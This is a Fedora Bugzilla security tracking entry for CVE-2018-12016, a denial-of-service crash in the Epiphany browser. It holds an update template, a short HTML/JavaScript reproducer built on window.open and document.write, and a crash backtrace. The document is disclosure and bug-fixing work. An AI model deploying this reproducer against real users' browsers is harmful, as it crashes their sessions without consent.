Bug 1588759

Summary: CVE-2018-12016 epiphany: Denial of service via window.open and document.write calls [fedora-all]

| Field | Value | Field | Value |
|---|---|---|---|
| Product: | Fedora | Reporter: | Pedro Sampaio <psampaio> |
| Component: | epiphany | Assignee: | Michael Catanzaro <mcatanzaro+wrong-account-do-not-cc> |
| Status: | CLOSED DUPLICATE | QA Contact: | Fedora Extras Quality Assurance <extras-qa> |
| Severity: | low | Docs Contact: | |
| Priority: | low | | |
| Version: | 28 | CC: | alexl, gecko-bugs-nobody, jhorak, john.j5live, mcatanzaro+wrong-account-do-not-cc, mclasen, phatina, rhughes, rstrode, sandmann, tpopela |
| Target Milestone: | --- | Keywords: | Security, SecurityTracking |
| Target Release: | --- | | |
| Hardware: | Unspecified | | |
| OS: | Unspecified | | |
| Whiteboard: | | | |
| Fixed In Version: | | Doc Type: | Release Note |
| Doc Text: | | Story Points: | --- |
| Clone Of: | | Environment: | |
| Last Closed: | 2018-06-08 01:12:21 UTC | Type: | --- |
| Regression: | --- | Mount Type: | --- |
| Documentation: | --- | CRM: | |
| Verified Versions: | | Category: | --- |
| oVirt Team: | --- | RHEL 7.3 requirements from Atomic Host: | |
| Cloudforms Team: | --- | Target Upstream Version: | |
| Embargoed: | | | |
| Bug Depends On: | | | |
| Bug Blocks: | 1588757 | | |
Description
Pedro Sampaio
2018-06-07 19:45:25 UTC
Use the following template for the 'fedpkg update' request to submit an update for this issue, as it contains the top-level parent bug(s) as well as this tracking bug. This will ensure that all associated bugs get updated when new packages are pushed to stable.

```
=====
# bugfix, security, enhancement, newpackage (required)
type=security

# testing, stable
request=testing

# Bug numbers: 1234,9876
bugs=1588757,1588759

# Description of your update
notes=Security fix for [PUT CVEs HERE]

# Enable request automation based on the stable/unstable karma thresholds
autokarma=True
stable_karma=3
unstable_karma=-3

# Automatically close bugs when this is marked as stable
close_bugs=True

# Suggest that users restart after update
suggest_reboot=False
======
```

Additionally, you may opt to use the bodhi web interface to submit updates: https://bodhi.fedoraproject.org/updates/new

This is a duplicate of CVE-2018-11396.

*** This bug has been marked as a duplicate of bug 1581801 ***

*** This bug has been marked as a duplicate of bug 1581802 ***

Reproducer is:

```html
<script>
b1tch3z = window.open("https://www.google.com", "bl1ngbl1ng", "width=250,height=250");
b1tch3z.document.write("<p>~ua b1tch3z</p>");
// https://github.com/undergroundagency
// https://github.com/ldpreload
</script>
```

Backtrace is:

```
#0  0x00007f7225278fec in session_seems_sane (windows=<optimized out>) at ../src/ephy-session.c:833
        url = 0x0
        uri = <optimized out>
        sane = 0
        t = 0x55f3a0b43e00 = {0x55f3a0b67040}
        w = 0x55f3a0b67120 = {0x55f3a1177b90}
        data = 0x55f3a16dad50
        buffer = <optimized out>
        writer = <optimized out>
        w = <optimized out>
        ret = -1
#1  0x00007f7225278fec in save_session_sync (task=0x55f3a1715370 [GTask], source_object=<optimized out>, task_data=<optimized out>, cancellable=<optimized out>) at ../src/ephy-session.c:876
        data = 0x55f3a16dad50
        buffer = <optimized out>
        writer = <optimized out>
        w = <optimized out>
        ret = -1
#2  0x00007f7224772937 in g_task_thread_pool_thread (thread_data=0x55f3a1715370, pool_data=<optimized out>) at gtask.c:1331
        task = 0x55f3a1715370 [GTask]
#3  0x00007f7224afb933 in g_thread_pool_thread_proxy (data=<optimized out>) at gthreadpool.c:307
        task = 0x55f3a1715370
        pool = 0x7f71f8001ba0
#4  0x00007f7224afaf2a in g_thread_proxy (data=0x55f3a1667680) at gthread.c:784
        thread = 0x55f3a1667680
        __func__ = "g_thread_proxy"
#5  0x00007f721d40e594 in start_thread (arg=<optimized out>) at pthread_create.c:463
        pd = <optimized out>
        now = <optimized out>
        unwind_buf = {cancel_jmp_buf = {{jmp_buf = {140125904402176, 5452651478893192296, 140721089925406, 140721089925407, 140721089925536, 140721089925536, -5383912463950420888, -5381925658964663192}, mask_was_saved = 0}}, priv = {pad = {0x0, 0x0, 0x0, 0x0}, data = {prev = 0x0, cleanup = 0x0, canceltype = 0}}}
        not_first_call = <optimized out>
#6  0x00007f722359700f in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:95
```

This is identical to the backtrace posted at https://bugzilla.gnome.org/show_bug.cgi?id=795740#c5.